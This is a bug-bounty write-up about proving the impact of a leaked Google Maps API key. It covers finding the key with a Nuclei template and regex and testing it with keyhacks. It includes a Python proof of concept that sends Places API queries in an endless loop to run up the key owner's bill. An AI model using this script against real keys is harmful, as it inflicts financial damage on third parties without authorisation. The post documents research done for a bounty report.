How I proved impact with Google Map API Key

Information Disclosure

In this story, I will share a method how to prove impact when we find google map API key. In my bug hunting journey, I found google map API key. But, I knew that google map API key is usually triaged to ‘informative’. So, I thought that I should prove risk when the google map API key is leaked. I will show you how I proved the impact.

Reproduce

After checking up a target manually, I was doing recon with automation tool. First, I was using Nuclei with default and custom templates.

With default templates, I found google map API key in /hopfully404 directory. I didn’t know what is /hopfully404 directory and how the template is structured.

The ‘google-api-key’ Nuclei template is just checking “AIza[0–9A-Za-z\\-]{35}” regex in response when acceess to BaseURL and BaseURL/hopfully404 directory.

In my target, when user accesses to BaseURL/hopfully404 directory, the page redirects to BaseURL page. The BaseURL default page contained the API key. So, the Nuclei tempate could detect it.

I searched the google map API key with Burp-Suite. My target application had finding world location function. So, I think the application uses maps.googleapis.com API in many other scripts like JS, HTML…etc.

I used ‘keyhack’ tool(https://github.com/streaak/keyhacks) for testing the API key available. The API key can be used for multiple purposes. If the API key request is exceed some criteria, owner of the API key should pay depending on the number of requests.

import requests
import time

interval = 0.5
word_path= "*****/****/****/wordlist"

def send_request():
    for word in words:
        url = f"https://maps.googleapis.com/maps/api/place/textsearch/json?query={word}&key=********************"
        
        response = requests.get(url)
        
        if response.status_code == 200:
            print(f"{url}")
        else:
            print(f"Failed => {response.status_code}")


def read_query(file_path):
    try:
        with open(file_path, 'r', encoding='utf-8') as file: 
            lines = file.readlines()  
            return lines
        
    except FileNotFoundError:
        print(f"File not found: {file_path}")
        
    except Exception as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    words = read_query(word_path)
    while True:
        send_request()
        time.sleep(interval)

Finally, I made a POC code. If attacker send requests excessively with the API key, owner of the API key can get financial risk. With this code, attacker can make a lot of requests with the API key automatically. Attacker can adjust interval time and number of words in word list.

Result

I reported with this POC, I got duplicated finally :)

Happy Hacking!!